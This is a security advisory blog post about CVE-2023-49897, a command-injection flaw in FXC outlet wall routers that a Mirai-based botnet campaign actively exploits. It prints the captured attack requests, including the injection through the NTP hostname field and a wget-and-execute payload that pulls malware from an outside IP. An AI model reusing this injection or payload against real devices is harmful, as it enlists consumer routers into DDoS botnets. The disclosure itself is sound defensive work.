Need cloud computing? Get started now

Actively Exploited Vulnerability in FXC Routers: Fixed, Patches Available

Akamai Wave Blue

Written by

Kyle Lefton, Chad Seaman, and Larry Cashdollar

December 06, 2023

Akamai Wave Blue

Written by

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Chad Seaman headshot

Written by

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

As part of the InfectedSlurs discovery, the SIRT uncovered a vulnerability in FXC AE1021 and AE1021PE outlet wall routers that are being actively exploited in the wild.

This blog post is an update to a previous post by the SIRT on the InfectedSlurs campaign.

Executive summary

  • The Akamai Security Intelligence Response Team (SIRT) has issued an update to the InfectedSlurs advisory series now that one of the affected vendors has released patched firmware versions and guidance. 

  • The vulnerability has been given the CVE ID of CVE-2023-49897 with a CVSS v3 score of 8.0.

  • Among the affected routers are Future X Communications (FXC) AE1021 and AE1021PE outlet wall routers, running firmware versions 2.0.9 and earlier.

  • The malicious payloads captured in the wild install a Mirai-based malware with the intention of creating a distributed denial-of-service (DDoS) botnet.

  • We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and possible active infections on defender networks.

Need to know

As part of the InfectedSlurs discovery, the SIRT uncovered a vulnerability in FXC AE1021 and AE1021PE outlet wall routers that are being actively exploited in the wild. This device is described as an outlet-based wireless LAN router for hotels and residential units. It is manufactured in Japan by FXC. This vulnerability has been assigned the CVE ID of CVE-2023-49897 with a CVSS v3 score of 8.0.

The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In its current configuration, it is utilizing device default credentials in the captured payloads.

The impacted firmware versions are:

  • AE1021PE firmware version 2.0.9 and earlier

  • AE1021 firmware version 2.0.9 and earlier

The vendor (FXC) has released a patched version of the device's firmware that corrects the vulnerability. The vendor suggests device owners update to firmware version 2.0.10 as soon as possible. They also recommend owners do a factory reset of the device and change the default management screen login password on the first boot.

The vendor advisory can be found at https://www.fxc.jp/news/20231206 with an advisory also being published by JPCERT, which is located here https://jvn.jp/en/vu/JVNVU92152057/ (Japanese release: https://jvn.jp/vu/JVNVU92152057/).

Exploitation observed

The payloads identified in the wild involve the installation of a Mirai-based malware. The campaign is building a botnet aimed at facilitating DDoS attacks — the botnet itself was covered in detail in our initial post.

 It’s hard to estimate how many devices in the wild are potentially compromisable or actively compromised because the captured attack payloads rely on the devices’ use of factory default authentication credentials.

Since the attacker must be authenticated, two unique interactions generated by the attacker were observed. We believe the first of these interactions is merely a fingerprinting attempt. The interaction targets the /cgi-bin/login.apply endpoint URL using default credentials (Figure 1).

  URL: /cgi-bin/login.apply
  Cookie: cookieno=489646; username=[redacted]; password=[redacted] 
  User-Agent: Go-http-client/1.1

  POST BODY:
  username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]

Fig, 1: FXC outlet wall router authentication attempt

If the authentication is successful, an exploit payload is delivered to the /cgi-bin/action endpoint URL approximately three seconds later (Figure 2).

  URL:/cgi-bin/action
  Cookie: username=[redacted]; password=[redacted]; cookieno=489646
  User-Agent: Go-http-client/1.1

  POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1

Fig. 2: FXC outlet wall router exploitation attempt

The raw exploit payloads captured in the wild attempt to leverage the OS command injection vulnerability to distribute a MIPS-compiled variant of Mirai (Figure 3).

  cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge

Fig. 3: Remote code execution  payloads observed in the wild

In our initial publication, the Akamai SIRT team provided an extensive list of IOCs, Snort rules, and YARA rules to help identify these exploit attempts in the wild and possible active infections on defender networks.

Conclusion

Internet of Things (IoT)–targeted campaigns result in countless instances in which everyday consumer devices are unwittingly enlisted in a number of malicious efforts. DDoS botnets and cryptomining schemes are just some of the potential outcomes that can happen completely unbeknownst to the consumer whose device is affected. In some cases, the user may not even know the credentials could be changed on these devices at all.

This revelation underscores the necessity for increased awareness and education regarding IoT best practices and the associated risks for the average consumer. The need for awareness isn’t exclusive to consumers — it also applies to manufacturers of these “set it and forget it” devices.

Basic security practices matter

The basics matter. These observations once again stress the importance of basic security best practices, such as changing default passwords on devices during initial setup. They also highlight the importance of implementing even stronger long-term, proactive security protocols, such as ensuring consistent updating of systems to shield against potential attacks, and occasionally checking in on the systems/devices, especially if they’re exhibiting odd behavior.

Stay tuned

The Akamai Security Intelligence Group will continue to monitor threats such as these and report on them to drive awareness in our customers and the security community in general. For more research, follow us on X, formerly known as Twitter, to keep up-to-date on what we’re seeing out there.

The Akamai SIRT would like to take a moment to thank CISA, US-CERT, JPCERT, and FXC for assistance with communications, coordination, identification, remediation, and disclosure efforts.

We would also like to thank Ryu Kuki, Takayuki Sasaki, and Katsunari Yoshioka of Yokohama National University for their diligent work. Although we didn’t get to work with them directly, it was brought to our attention that they had reported the same vulnerability to JPCERT and FXC at roughly the same time as our own reports.  It’s always great to find fellow defenders taking active roles in making the internet a better and more secure place for everyone.



Akamai Wave Blue

Written by

Kyle Lefton, Chad Seaman, and Larry Cashdollar

December 06, 2023

Akamai Wave Blue

Written by

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Chad Seaman headshot

Written by

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.